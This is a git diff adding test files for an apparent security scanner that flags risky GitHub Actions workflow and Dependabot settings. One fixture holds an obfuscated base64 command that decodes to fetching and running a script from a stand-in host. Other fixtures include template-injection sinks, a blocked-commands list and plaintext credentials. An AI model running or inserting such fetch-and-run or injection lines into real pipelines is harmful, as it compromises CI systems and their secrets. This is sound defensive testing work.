environment: "production", + steps: [ + { + run: "./deploy.sh", + env: { + API_KEY: "${{ secrets.API_KEY }}", + }, + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(0); + }); +}); diff --git a/tests/layer2/workflow-self-hosted-runner.test.ts b/tests/layer2/workflow-self-hosted-runner.test.ts new file mode 100644 index 0000000..bd5259f --- /dev/null +++ b/tests/layer2/workflow-self-hosted-runner.test.ts @@ -0,0 +1,54 @@ +import { describe, expect, it } from "vitest"; +import { detectWorkflowSelfHostedRunner } from "../../src/layer2-static/detectors/workflow-self-hosted-runner"; + +describe("workflow self-hosted runner detector", () => { + it("flags jobs that use self-hosted runners", () => { + const findings = detectWorkflowSelfHostedRunner({ + filePath: ".github/workflows/deploy.yml", + textContent: `name: deploy +on: push +jobs: + deploy: + runs-on: [self-hosted, linux] + steps: + - run: echo deploy +`, + parsed: { + on: ["push"], + jobs: { + deploy: { + "runs-on": ["self-hosted", "linux"], + steps: [{ run: "echo deploy" }], + }, + }, + }, + }); + + expect(findings).toHaveLength(1); + expect(findings[0]?.rule_id).toBe("workflow-self-hosted-runner"); + expect(findings[0]?.evidence).toContain("self-hosted"); + }); + + it("ignores hosted runners", () => { + const findings = detectWorkflowSelfHostedRunner({ + filePath: ".github/workflows/deploy.yml", + textContent: `jobs: + deploy: + runs-on: ubuntu-latest + steps: + - run: echo deploy +`, + parsed: { + on: ["push"], + jobs: { + deploy: { + "runs-on": "ubuntu-latest", + steps: [{ run: "echo deploy" }], + }, + }, + }, + }); + + expect(findings).toHaveLength(0); + }); +}); diff --git a/tests/layer2/workflow-stale-action-refs.test.ts b/tests/layer2/workflow-stale-action-refs.test.ts new file mode 100644 index 0000000..5bb4232 --- /dev/null +++ b/tests/layer2/workflow-stale-action-refs.test.ts @@ -0,0 +1,107 @@ +import { afterEach, describe, expect, it, vi } from "vitest"; +import { 
detectWorkflowStaleActionRefs } from "../../src/layer2-static/detectors/workflow-stale-action-refs"; + +function makeResponse(tags: Array<{ commit: { sha: string } }>, link = "") { + return { + ok: true, + status: 200, + json: async () => tags, + headers: { + get: (name: string) => { + if (name.toLowerCase() === "link") { + return link || null; + } + return null; + }, + }, + }; +} + +describe("workflow stale action refs detector", () => { + afterEach(() => { + vi.unstubAllGlobals(); + vi.restoreAllMocks(); + }); + + it("flags commit pins that do not resolve to a tag", async () => { + vi.stubGlobal( + "fetch", + vi.fn(async () => + makeResponse([ + { + commit: { + sha: "1111111111111111111111111111111111111111", + }, + }, + ]), + ), + ); + + const findings = await detectWorkflowStaleActionRefs({ + filePath: ".github/workflows/ci.yml", + textContent: [ + "jobs:", + " build:", + " steps:", + " - uses: actions/checkout@009b9ae9e446ad8d9b8c809870b0fbcc5e03573e", + "", + ].join("\n"), + parsed: { + on: ["pull_request"], + jobs: { + build: { + steps: [ + { + uses: "actions/checkout@009b9ae9e446ad8d9b8c809870b0fbcc5e03573e", + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(1); + expect(findings[0]?.rule_id).toBe("workflow-stale-action-refs"); + expect(findings[0]?.evidence).toContain("009b9ae9e446ad8d9b8c809870b0fbcc5e03573e"); + }); + + it("ignores commit pins that point to a tag", async () => { + vi.stubGlobal( + "fetch", + vi.fn(async () => + makeResponse([ + { + commit: { + sha: "009b9ae9e446ad8d9b8c809870b0fbcc5e03573e", + }, + }, + ]), + ), + ); + + const findings = await detectWorkflowStaleActionRefs({ + filePath: ".github/workflows/ci.yml", + textContent: [ + "jobs:", + " build:", + " steps:", + " - uses: actions/checkout@009b9ae9e446ad8d9b8c809870b0fbcc5e03573e", + "", + ].join("\n"), + parsed: { + on: ["pull_request"], + jobs: { + build: { + steps: [ + { + uses: "actions/checkout@009b9ae9e446ad8d9b8c809870b0fbcc5e03573e", + }, + ], + }, + }, + }, 
+ }); + + expect(findings).toHaveLength(0); + }); +}); diff --git a/tests/layer2/workflow-superfluous-actions.test.ts b/tests/layer2/workflow-superfluous-actions.test.ts new file mode 100644 index 0000000..2c525dd --- /dev/null +++ b/tests/layer2/workflow-superfluous-actions.test.ts @@ -0,0 +1,41 @@ +import { describe, expect, it } from "vitest"; +import { detectWorkflowSuperfluousActions } from "../../src/layer2-static/detectors/workflow-superfluous-actions"; + +describe("workflow superfluous actions detector", () => { + it("flags duplicate external action usage within the same job", () => { + const findings = detectWorkflowSuperfluousActions({ + filePath: ".github/workflows/ci.yml", + textContent: `on: [push]\njobs:\n build:\n runs-on: ubuntu-latest\n steps:\n - uses: actions/checkout@v4\n - uses: actions/checkout@v4\n`, + parsed: { + on: ["push"], + jobs: { + build: { + "runs-on": "ubuntu-latest", + steps: [{ uses: "actions/checkout@v4" }, { uses: "actions/checkout@v4" }], + }, + }, + }, + }); + + expect(findings).toHaveLength(1); + expect(findings[0]?.rule_id).toBe("workflow-superfluous-actions"); + }); + + it("does not flag single-use actions", () => { + const findings = detectWorkflowSuperfluousActions({ + filePath: ".github/workflows/ci.yml", + textContent: `on: [push]\njobs:\n build:\n runs-on: ubuntu-latest\n steps:\n - uses: actions/checkout@v4\n`, + parsed: { + on: ["push"], + jobs: { + build: { + "runs-on": "ubuntu-latest", + steps: [{ uses: "actions/checkout@v4" }], + }, + }, + }, + }); + + expect(findings).toHaveLength(0); + }); +}); diff --git a/tests/layer2/workflow-template-injection.test.ts b/tests/layer2/workflow-template-injection.test.ts new file mode 100644 index 0000000..dac1a51 --- /dev/null +++ b/tests/layer2/workflow-template-injection.test.ts @@ -0,0 +1,117 @@ +import { describe, expect, it } from "vitest"; +import { runStaticEngine, type StaticEngineConfig } from "../../src/layer2-static/engine"; + +const BASE_CONFIG: StaticEngineConfig 
= { + knownSafeMcpServers: [], + knownSafeFormatters: [], + knownSafeLspServers: [], + knownSafeHooks: [], + blockedCommands: ["bash", "sh"], + trustedApiDomains: [], + unicodeAnalysis: true, + checkIdeSettings: true, + persona: "regular", + runtimeMode: "offline", + workflowAuditsEnabled: true, +}; + +describe("workflow template injection detector", () => { + it("flags template expansion in run steps on untrusted triggers", async () => { + const findings = await runStaticEngine({ + projectRoot: "/tmp/project", + files: [ + { + filePath: ".github/workflows/pr.yml", + format: "yaml", + textContent: "", + parsed: { + on: ["pull_request"], + jobs: { + test: { + steps: [ + { + run: "echo ${{ github.event.pull_request.title }}", + }, + ], + }, + }, + }, + }, + ], + symlinkEscapes: [], + hooks: [], + config: BASE_CONFIG, + }); + + expect(findings.some((finding) => finding.rule_id === "workflow-template-injection")).toBe( + true, + ); + }); + + it("flags known action sink inputs containing template expansions", async () => { + const findings = await runStaticEngine({ + projectRoot: "/tmp/project", + files: [ + { + filePath: ".github/workflows/pr.yml", + format: "yaml", + textContent: "", + parsed: { + on: ["pull_request"], + jobs: { + test: { + steps: [ + { + uses: "actions/github-script@v7", + with: { + script: "core.info('${{ github.event.pull_request.title }}')", + }, + }, + ], + }, + }, + }, + }, + ], + symlinkEscapes: [], + hooks: [], + config: BASE_CONFIG, + }); + + expect(findings.some((finding) => finding.rule_id === "workflow-template-injection")).toBe( + true, + ); + }); + + it("does not flag template expansion in trusted push-only workflows", async () => { + const findings = await runStaticEngine({ + projectRoot: "/tmp/project", + files: [ + { + filePath: ".github/workflows/push.yml", + format: "yaml", + textContent: "", + parsed: { + on: ["push"], + jobs: { + test: { + steps: [ + { + run: "echo ${{ github.ref }}", + }, + ], + }, + }, + }, + }, + ], + 
symlinkEscapes: [], + hooks: [], + config: BASE_CONFIG, + }); + + expect(findings.some((finding) => finding.rule_id === "workflow-template-injection")).toBe( + false, + ); + }); +}); diff --git a/tests/layer2/workflow-undocumented-permissions.test.ts b/tests/layer2/workflow-undocumented-permissions.test.ts new file mode 100644 index 0000000..b952532 --- /dev/null +++ b/tests/layer2/workflow-undocumented-permissions.test.ts @@ -0,0 +1,87 @@ +import { describe, expect, it } from "vitest"; +import { detectWorkflowUndocumentedPermissions } from "../../src/layer2-static/detectors/workflow-undocumented-permissions"; + +describe("workflow undocumented permissions detector", () => { + it("flags write permissions without comments", () => { + const textContent = `name: release +on: push +permissions: + contents: write +jobs: + publish: + runs-on: ubuntu-latest + permissions: + packages: write + steps: + - run: npm publish +`; + + const findings = detectWorkflowUndocumentedPermissions({ + filePath: ".github/workflows/release.yml", + parsed: { + on: ["push"], + permissions: { + contents: "write", + }, + jobs: { + publish: { + permissions: { + packages: "write", + }, + steps: [ + { + run: "npm publish", + }, + ], + }, + }, + }, + textContent, + }); + + expect(findings.length).toBeGreaterThan(0); + expect( + findings.some((finding) => finding.rule_id === "workflow-undocumented-permissions"), + ).toBe(true); + }); + + it("ignores documented permissions comments", () => { + const textContent = `name: release +on: push +permissions: # ok + contents: write # needed for release metadata +jobs: + publish: + runs-on: ubuntu-latest + permissions: + packages: write # needed to publish + steps: + - run: npm publish +`; + + const findings = detectWorkflowUndocumentedPermissions({ + filePath: ".github/workflows/release.yml", + parsed: { + on: ["push"], + permissions: { + contents: "write", + }, + jobs: { + publish: { + permissions: { + packages: "write", + }, + steps: [ + { + run: "npm 
publish", + }, + ], + }, + }, + }, + textContent, + }); + + expect(findings).toHaveLength(0); + }); +}); diff --git a/tests/layer2/workflow-unpinned-images.test.ts b/tests/layer2/workflow-unpinned-images.test.ts new file mode 100644 index 0000000..032ff10 --- /dev/null +++ b/tests/layer2/workflow-unpinned-images.test.ts @@ -0,0 +1,63 @@ +import { describe, expect, it } from "vitest"; +import { detectWorkflowUnpinnedImages } from "../../src/layer2-static/detectors/workflow-unpinned-images"; + +describe("workflow unpinned images detector", () => { + it("flags workflow container and service images without immutable pins", () => { + const findings = detectWorkflowUnpinnedImages({ + filePath: ".github/workflows/images.yml", + textContent: [ + "jobs:", + " build:", + " container:", + " image: ghcr.io/acme/build", + " services:", + " redis:", + " image: redis:latest", + " pinned:", + " image: redis@sha256:7df1eeff67eb0ba84f6b9d2940765a6bb1158081426745c185a03b1507de6a09", + "", + ].join("\n"), + parsed: { + on: ["push"], + jobs: { + build: { + container: { + image: "ghcr.io/acme/build", + }, + services: { + redis: { + image: "redis:latest", + }, + pinned: { + image: + "redis@sha256:7df1eeff67eb0ba84f6b9d2940765a6bb1158081426745c185a03b1507de6a09", + }, + }, + }, + }, + }, + }); + + expect(findings).toHaveLength(2); + expect(findings.every((finding) => finding.rule_id === "workflow-unpinned-images")).toBe(true); + expect(findings[0]?.evidence).toMatch(/ghcr\.io\/acme\/build|redis:latest/); + }); + + it("ignores non-workflow files", () => { + const findings = detectWorkflowUnpinnedImages({ + filePath: "src/index.ts", + textContent: "", + parsed: { + jobs: { + build: { + container: { + image: "ghcr.io/acme/build", + }, + }, + }, + }, + }); + + expect(findings).toHaveLength(0); + }); +}); diff --git a/tests/layer2/workflow-unpinned-uses.test.ts b/tests/layer2/workflow-unpinned-uses.test.ts new file mode 100644 index 0000000..b574353 --- /dev/null +++ 
b/tests/layer2/workflow-unpinned-uses.test.ts @@ -0,0 +1,74 @@ +import { describe, expect, it } from "vitest"; +import { runStaticEngine, type StaticEngineConfig } from "../../src/layer2-static/engine"; + +const BASE_CONFIG: StaticEngineConfig = { + knownSafeMcpServers: [], + knownSafeFormatters: [], + knownSafeLspServers: [], + knownSafeHooks: [], + blockedCommands: ["bash", "sh"], + trustedApiDomains: [], + unicodeAnalysis: true, + checkIdeSettings: true, + persona: "regular", + runtimeMode: "offline", + workflowAuditsEnabled: true, +}; + +describe("workflow unpinned uses detector", () => { + it("flags unpinned repository action refs", async () => { + const findings = await runStaticEngine({ + projectRoot: "/tmp/project", + files: [ + { + filePath: ".github/workflows/ci.yml", + format: "yaml", + textContent: "", + parsed: { + on: ["pull_request"], + jobs: { + test: { + steps: [{ uses: "actions/checkout@v4" }, { uses: "./.github/actions/local" }], + }, + }, + }, + }, + ], + symlinkEscapes: [], + hooks: [], + config: BASE_CONFIG, + }); + + expect(findings.some((finding) => finding.rule_id === "workflow-unpinned-uses")).toBe(true); + }); + + it("does not flag hash-pinned refs", async () => { + const findings = await runStaticEngine({ + projectRoot: "/tmp/project", + files: [ + { + filePath: ".github/workflows/ci.yml", + format: "yaml", + textContent: "", + parsed: { + on: ["push"], + jobs: { + test: { + steps: [ + { + uses: "actions/checkout@0123456789abcdef0123456789abcdef01234567", + }, + ], + }, + }, + }, + }, + ], + symlinkEscapes: [], + hooks: [], + config: BASE_CONFIG, + }); + + expect(findings.some((finding) => finding.rule_id === "workflow-unpinned-uses")).toBe(false); + }); +}); diff --git a/tests/layer2/workflow-unredacted-secrets.test.ts b/tests/layer2/workflow-unredacted-secrets.test.ts new file mode 100644 index 0000000..f7d3707 --- /dev/null +++ b/tests/layer2/workflow-unredacted-secrets.test.ts @@ -0,0 +1,71 @@ +import { describe, expect, it } from 
"vitest"; +import { detectWorkflowUnredactedSecrets } from "../../src/layer2-static/detectors/workflow-unredacted-secrets"; + +describe("workflow unredacted secrets detector", () => { + it("flags plaintext secret-like env values", () => { + const findings = detectWorkflowUnredactedSecrets({ + filePath: ".github/workflows/release.yml", + textContent: `on: [push] +jobs: + release: + runs-on: ubuntu-latest + steps: + - run: npm publish + env: + NPM_TOKEN: abc123plaintexttoken +`, + parsed: { + on: ["push"], + jobs: { + release: { + "runs-on": "ubuntu-latest", + steps: [ + { + run: "npm publish", + env: { + NPM_TOKEN: "abc123plaintexttoken", + }, + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(1); + expect(findings[0]?.rule_id).toBe("unredacted-secrets"); + }); + + it("does not flag references to repository secrets", () => { + const findings = detectWorkflowUnredactedSecrets({ + filePath: ".github/workflows/release.yml", + textContent: `on: [push] +jobs: + release: + runs-on: ubuntu-latest + steps: + - run: npm publish + env: + NPM_TOKEN: \${{ secrets.NPM_TOKEN }} +`, + parsed: { + on: ["push"], + jobs: { + release: { + "runs-on": "ubuntu-latest", + steps: [ + { + run: "npm publish", + env: { + NPM_TOKEN: "${{ secrets.NPM_TOKEN }}", + }, + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(0); + }); +}); diff --git a/tests/layer2/workflow-unsound-condition.test.ts b/tests/layer2/workflow-unsound-condition.test.ts new file mode 100644 index 0000000..db8e038 --- /dev/null +++ b/tests/layer2/workflow-unsound-condition.test.ts @@ -0,0 +1,51 @@ +import { describe, expect, it } from "vitest"; +import { detectWorkflowUnsoundCondition } from "../../src/layer2-static/detectors/workflow-unsound-condition"; + +describe("workflow unsound condition detector", () => { + it("flags always() conditions on sensitive execution steps", () => { + const findings = detectWorkflowUnsoundCondition({ + filePath: ".github/workflows/release.yml", + textContent: `on: 
[push]\njobs:\n publish:\n runs-on: ubuntu-latest\n steps:\n - if: always()\n run: npm publish\n`, + parsed: { + on: ["push"], + jobs: { + publish: { + "runs-on": "ubuntu-latest", + steps: [ + { + if: "always()", + run: "npm publish", + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(1); + expect(findings[0]?.rule_id).toBe("workflow-unsound-condition"); + }); + + it("does not flag bounded conditions", () => { + const findings = detectWorkflowUnsoundCondition({ + filePath: ".github/workflows/release.yml", + textContent: `on: [push]\njobs:\n publish:\n runs-on: ubuntu-latest\n steps:\n - if: success()\n run: npm publish\n`, + parsed: { + on: ["push"], + jobs: { + publish: { + "runs-on": "ubuntu-latest", + steps: [ + { + if: "success()", + run: "npm publish", + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(0); + }); +}); diff --git a/tests/layer2/workflow-unsound-contains.test.ts b/tests/layer2/workflow-unsound-contains.test.ts new file mode 100644 index 0000000..6016c78 --- /dev/null +++ b/tests/layer2/workflow-unsound-contains.test.ts @@ -0,0 +1,51 @@ +import { describe, expect, it } from "vitest"; +import { detectWorkflowUnsoundContains } from "../../src/layer2-static/detectors/workflow-unsound-contains"; + +describe("workflow unsound contains detector", () => { + it("flags contains-based trust gates over untrusted pull request data", () => { + const findings = detectWorkflowUnsoundContains({ + filePath: ".github/workflows/release.yml", + textContent: `on: [pull_request]\njobs:\n release:\n runs-on: ubuntu-latest\n steps:\n - if: contains(github.event.pull_request.title, 'safe-to-release')\n run: npm publish\n`, + parsed: { + on: ["pull_request"], + jobs: { + release: { + "runs-on": "ubuntu-latest", + steps: [ + { + if: "contains(github.event.pull_request.title, 'safe-to-release')", + run: "npm publish", + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(1); + 
expect(findings[0]?.rule_id).toBe("workflow-unsound-contains"); + }); + + it("does not flag contains checks over trusted refs", () => { + const findings = detectWorkflowUnsoundContains({ + filePath: ".github/workflows/release.yml", + textContent: `on: [push]\njobs:\n release:\n runs-on: ubuntu-latest\n steps:\n - if: contains(github.ref, 'refs/heads/main')\n run: npm publish\n`, + parsed: { + on: ["push"], + jobs: { + release: { + "runs-on": "ubuntu-latest", + steps: [ + { + if: "contains(github.ref, 'refs/heads/main')", + run: "npm publish", + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(0); + }); +}); diff --git a/tests/layer2/workflow-use-trusted-publishing.test.ts b/tests/layer2/workflow-use-trusted-publishing.test.ts new file mode 100644 index 0000000..fccf164 --- /dev/null +++ b/tests/layer2/workflow-use-trusted-publishing.test.ts @@ -0,0 +1,84 @@ +import { describe, expect, it } from "vitest"; +import { detectWorkflowUseTrustedPublishing } from "../../src/layer2-static/detectors/workflow-use-trusted-publishing"; + +describe("workflow trusted publishing detector", () => { + it("flags token-based npm publishing", () => { + const textContent = `name: release +on: + release: + types: [published] +jobs: + publish: + runs-on: ubuntu-latest + steps: + - run: npm publish + env: + NODE_AUTH_TOKEN: \${{ secrets.NPM_TOKEN }} +`; + + const findings = detectWorkflowUseTrustedPublishing({ + filePath: ".github/workflows/release.yml", + parsed: { + on: { + release: { + types: ["published"], + }, + }, + jobs: { + publish: { + steps: [ + { + run: "npm publish", + }, + ], + }, + }, + }, + textContent, + }); + + expect(findings).toHaveLength(1); + expect(findings[0]?.rule_id).toBe("workflow-use-trusted-publishing"); + expect(findings[0]?.evidence).toContain("npm publish"); + }); + + it("does not flag publish steps that already use id-token auth", () => { + const textContent = `name: release +on: + release: + types: [published] +jobs: + publish: + permissions: 
+ id-token: write + steps: + - run: npm publish +`; + + const findings = detectWorkflowUseTrustedPublishing({ + filePath: ".github/workflows/release.yml", + parsed: { + on: { + release: { + types: ["published"], + }, + }, + jobs: { + publish: { + permissions: { + "id-token": "write", + }, + steps: [ + { + run: "npm publish", + }, + ], + }, + }, + }, + textContent, + }); + + expect(findings).toHaveLength(0); + }); +}); diff --git a/tests/layer2/workflow-wave-b-engine.test.ts b/tests/layer2/workflow-wave-b-engine.test.ts new file mode 100644 index 0000000..fe1444b --- /dev/null +++ b/tests/layer2/workflow-wave-b-engine.test.ts @@ -0,0 +1,128 @@ +import { afterEach, describe, expect, it, vi } from "vitest"; +import { runStaticEngine, type StaticEngineConfig } from "../../src/layer2-static/engine"; + +const BASE_CONFIG: StaticEngineConfig = { + knownSafeMcpServers: [], + knownSafeFormatters: [], + knownSafeLspServers: [], + knownSafeHooks: [], + blockedCommands: ["bash", "sh"], + trustedApiDomains: [], + unicodeAnalysis: true, + checkIdeSettings: true, + persona: "auditor", + runtimeMode: "online", + workflowAuditsEnabled: true, +}; + +function buildWorkflowFixture() { + const textContent = [ + "name: ci", + "on: [push]", + "jobs:", + " build:", + " runs-on: ubuntu-latest", + " container:", + " image: node:latest", + " steps:", + " - uses: actions/setup-ruby@aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa", + " - uses: actions/checkout@bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb", + " - uses: actions/cache@cccccccccccccccccccccccccccccccccccccccc # v3.0.0", + "", + ].join("\n"); + + const parsed = { + on: ["push"], + jobs: { + build: { + "runs-on": "ubuntu-latest", + container: { + image: "node:latest", + }, + steps: [ + { uses: "actions/setup-ruby@aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" }, + { uses: "actions/checkout@bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb" }, + { uses: "actions/cache@cccccccccccccccccccccccccccccccccccccccc" }, + ], + }, + }, + }; + + return { textContent, 
parsed }; +} + +describe("workflow wave B engine integration", () => { + afterEach(() => { + vi.unstubAllGlobals(); + vi.restoreAllMocks(); + }); + + it("surfaces Wave B findings through runStaticEngine in online mode", async () => { + vi.stubGlobal( + "fetch", + vi.fn(async (input: string | URL) => { + const url = String(input); + + if (url.includes("/repos/actions/setup-ruby")) { + return new Response(JSON.stringify({ archived: true }), { + status: 200, + headers: { "content-type": "application/json" }, + }); + } + + if (url.includes("/repos/actions/checkout/tags")) { + return new Response(JSON.stringify([]), { + status: 200, + headers: { "content-type": "application/json" }, + }); + } + + if (url.includes("/repos/actions/cache/git/ref/tags/v3.0.0")) { + return new Response( + JSON.stringify({ + object: { + type: "commit", + sha: "dddddddddddddddddddddddddddddddddddddddd", + }, + }), + { + status: 200, + headers: { "content-type": "application/json" }, + }, + ); + } + + if (url.includes("/repos/actions/checkout/commits/")) { + return new Response("not found", { status: 404 }); + } + + return new Response("not found", { status: 404 }); + }), + ); + + const fixture = buildWorkflowFixture(); + + const findings = await runStaticEngine({ + projectRoot: "/tmp/project", + files: [ + { + filePath: ".github/workflows/ci.yml", + format: "yaml", + parsed: fixture.parsed, + textContent: fixture.textContent, + }, + ], + symlinkEscapes: [], + hooks: [], + config: BASE_CONFIG, + }); + + const ruleIds = new Set(findings.map((finding) => finding.rule_id)); + + expect(ruleIds.has("workflow-archived-uses")).toBe(true); + expect(ruleIds.has("workflow-stale-action-refs")).toBe(true); + expect(ruleIds.has("workflow-ref-version-mismatch")).toBe(true); + expect(ruleIds.has("workflow-impostor-commit")).toBe(true); + expect(ruleIds.has("workflow-unpinned-images")).toBe(true); + }); +}); diff --git a/tests/layer2/workflow-wave-cde-engine.test.ts 
b/tests/layer2/workflow-wave-cde-engine.test.ts new file mode 100644 index 0000000..425ec39 --- /dev/null +++ b/tests/layer2/workflow-wave-cde-engine.test.ts @@ -0,0 +1,121 @@ +import { describe, expect, it } from "vitest"; +import { runStaticEngine, type StaticEngineConfig } from "../../src/layer2-static/engine"; + +const BASE_CONFIG: StaticEngineConfig = { + knownSafeMcpServers: [], + knownSafeFormatters: [], + knownSafeLspServers: [], + knownSafeHooks: [], + blockedCommands: ["bash", "sh"], + trustedApiDomains: [], + unicodeAnalysis: true, + checkIdeSettings: true, + persona: "auditor", + runtimeMode: "offline", + workflowAuditsEnabled: true, +}; + +describe("workflow wave C/D/E engine integration", () => { + it("surfaces newly added Wave C/D/E audit findings through runStaticEngine", async () => { + const findings = await runStaticEngine({ + projectRoot: "/tmp/project", + files: [ + { + filePath: ".github/workflows/release.yml", + format: "yaml", + textContent: `on: [pull_request] +jobs: + release: + runs-on: ubuntu-latest + container: + image: ghcr.io/user:pass@ghcr.io/org/private-image:latest + steps: + - if: github.actor == 'dependabot[bot]' + run: npm publish + - if: always() + run: npm publish + - if: contains(github.event.pull_request.title, 'safe') + run: npm publish + - run: echo "Y3VybCAtZnNTTCBodHRwczovL2V2aWwuZXhhbXBsZS9wLnNoIHwgc2g=" | base64 -d | bash + - run: npm publish + env: + NPM_TOKEN: abc123plaintexttoken +`, + parsed: { + on: ["pull_request"], + jobs: { + release: { + "runs-on": "ubuntu-latest", + container: { + image: "ghcr.io/user:pass@ghcr.io/org/private-image:latest", + }, + steps: [ + { + if: "github.actor == 'dependabot[bot]'", + run: "npm publish", + }, + { + if: "always()", + run: "npm publish", + }, + { + if: "contains(github.event.pull_request.title, 'safe')", + run: "npm publish", + }, + { + run: 'echo "Y3VybCAtZnNTTCBodHRwczovL2V2aWwuZXhhbXBsZS9wLnNoIHwgc2g=" | base64 -d | bash', + }, + { + run: "npm publish", + env: { + 
NPM_TOKEN: "abc123plaintexttoken", + }, + }, + ], + }, + }, + }, + }, + { + filePath: ".github/dependabot.yml", + format: "yaml", + textContent: `version: 2 +updates: + - package-ecosystem: npm + directory: / + schedule: + interval: daily + insecure-external-code-execution: allow +`, + parsed: { + version: 2, + updates: [ + { + "package-ecosystem": "npm", + directory: "/", + schedule: { + interval: "daily", + }, + "insecure-external-code-execution": "allow", + }, + ], + }, + }, + ], + symlinkEscapes: [], + hooks: [], + config: BASE_CONFIG, + }); + + const ruleIds = new Set(findings.map((finding) => finding.rule_id)); + expect(ruleIds.has("workflow-anonymous-definition")).toBe(true); + expect(ruleIds.has("workflow-obfuscation")).toBe(true); + expect(ruleIds.has("workflow-unsound-condition")).toBe(true); + expect(ruleIds.has("workflow-unsound-contains")).toBe(true); + expect(ruleIds.has("hardcoded-container-credentials")).toBe(true); + expect(ruleIds.has("unredacted-secrets")).toBe(true); + expect(ruleIds.has("bot-conditions")).toBe(true); + expect(ruleIds.has("dependabot-cooldown")).toBe(true); + expect(ruleIds.has("dependabot-execution")).toBe(true); + }); +}); diff --git a/tests/meta/workflow-audit-parity-contract.test.ts b/tests/meta/workflow-audit-parity-contract.test.ts new file mode 100644 index 0000000..d8f2585 --- /dev/null +++ b/tests/meta/workflow-audit-parity-contract.test.ts @@ -0,0 +1,61 @@ +import { existsSync, readFileSync } from "node:fs"; +import { resolve } from "node:path"; +import { describe, expect, it } from "vitest"; + +const root = resolve(process.cwd()); +const checklistPath = resolve(root, "docs/workflow-audit-parity-checklist.md"); + +const expectedCheckedAuditIds = [ + "dangerous-triggers", + "excessive-permissions", + "known-vulnerable-actions", + "template-injection", + "unpinned-uses", + "artipacked", + "cache-poisoning", + "github-env", + "insecure-commands", + "self-hosted-runner", + "overprovisioned-secrets", + 
"secrets-outside-env", + "secrets-inherit", + "use-trusted-publishing", + "undocumented-permissions", + "archived-uses", + "stale-action-refs", + "forbidden-uses", + "ref-confusion", + "ref-version-mismatch", + "impostor-commit", + "unpinned-images", + "anonymous-definition", + "concurrency-limits", + "superfluous-actions", + "misfeature", + "obfuscation", + "unsound-condition", + "unsound-contains", + "dependabot-cooldown", + "dependabot-execution", + "hardcoded-container-credentials", + "unredacted-secrets", + "bot-conditions", +] as const; + +function readChecklist(): string { + return readFileSync(checklistPath, "utf8"); +} + +describe("workflow audit parity checklist contract", () => { + it("exists at the documented location", () => { + expect(existsSync(checklistPath)).toBe(true); + }); + + it("marks every currently implemented workflow audit id as checked", () => { + const checklist = readChecklist(); + + for (const auditId of expectedCheckedAuditIds) { + expect(checklist).toContain(`- [x] \`${auditId}\``); + } + }); +}); diff --git a/tests/pipeline/static-pipeline.test.ts b/tests/pipeline/static-pipeline.test.ts index 17d768f..4ba2a3c 100644 --- a/tests/pipeline/static-pipeline.test.ts +++ b/tests/pipeline/static-pipeline.test.ts @@ -2,8 +2,8 @@ import { describe, expect, it } from "vitest"; import { runStaticPipeline } from "../../src/pipeline"; describe("task 14 static pipeline orchestration", () => { - it("deduplicates repeated threats across files and preserves affected locations", () => { - const report = runStaticPipeline({ + it("deduplicates repeated threats across files and preserves affected locations", async () => { + const report = await runStaticPipeline({ version: "0.1.0", kbVersion: "2026-02-28", scanTarget: ".", diff --git a/tests/report/finding-fingerprint.test.ts b/tests/report/finding-fingerprint.test.ts index 7726d77..b8bc736 100644 --- a/tests/report/finding-fingerprint.test.ts +++ b/tests/report/finding-fingerprint.test.ts @@ -50,8 
+50,8 @@ describe("finding fingerprints", () => { expect(buildFindingFingerprint(base)).not.toBe(buildFindingFingerprint(moved)); }); - it("stamps fingerprints onto findings returned by the pipeline", () => { - const report = runStaticPipeline({ + it("stamps fingerprints onto findings returned by the pipeline", async () => { + const report = await runStaticPipeline({ version: "0.1.0", kbVersion: "2026-02-28", scanTarget: ".", diff --git a/tests/reporter/sarif.test.ts b/tests/reporter/sarif.test.ts index feeeec7..31084fe 100644 --- a/tests/reporter/sarif.test.ts +++ b/tests/reporter/sarif.test.ts @@ -20,6 +20,12 @@ describe("task 15 sarif reporter", () => { layer: "L2", file_path: ".claude/settings.json", location: { field: "env.ANTHROPIC_BASE_URL", line: 2 }, + affected_locations: [ + { + file_path: ".claude/settings.json", + location: { field: "mcpServers.bad.command", line: 9, column: 3 }, + }, + ], description: "Untrusted endpoint", affected_tools: ["claude-code"], cve: "CVE-2026-21852", @@ -51,7 +57,11 @@ describe("task 15 sarif reporter", () => { version: string; runs: Array<{ tool: { driver: { rules: Array<{ id: string }> } }; - results: Array<{ ruleId: string; properties?: Record<string, unknown> }>; + results: Array<{ + ruleId: string; + properties?: Record<string, unknown>; + relatedLocations?: Array<unknown>; + }>; }>; }; @@ -67,5 +77,6 @@ describe("task 15 sarif reporter", () => { sinks: ["api-redirect"], origin: "sarif-reporter-test", }); + expect(sarif.runs[0]?.results[0]?.relatedLocations?.length).toBe(1); }); }); diff --git a/tests/reporter/terminal.test.ts b/tests/reporter/terminal.test.ts index acf4945..923e74a 100644 --- a/tests/reporter/terminal.test.ts +++ b/tests/reporter/terminal.test.ts @@ -70,6 +70,16 @@ describe("task 15 terminal reporter", () => { layer: "L2", file_path: ".mcp.json", location: { field: "mcpServers.bad.command", line: 12, column: 9 }, + affected_locations: [ + { + file_path: ".mcp.json", + location: { field: "mcpServers.bad.args", line: 14, column: 11 }, + }, + {
file_path: ".cursor/mcp.json", + location: { field: "mcpServers.bad.command", line: 3, column: 5 }, + }, + ], description: "Potential command execution from project MCP server", affected_tools: ["claude-code"], cve: "CVE-2025-61260", @@ -105,6 +115,7 @@ describe("task 15 terminal reporter", () => { expect(output).toContain("CVE: CVE-2025-61260"); expect(output).toContain("OWASP: ASI02, ASI05"); expect(output).toContain("Metadata:"); + expect(output).toContain("Affected locations:"); expect(output).toContain("Sources:"); expect(output).toContain("Risk tags:"); });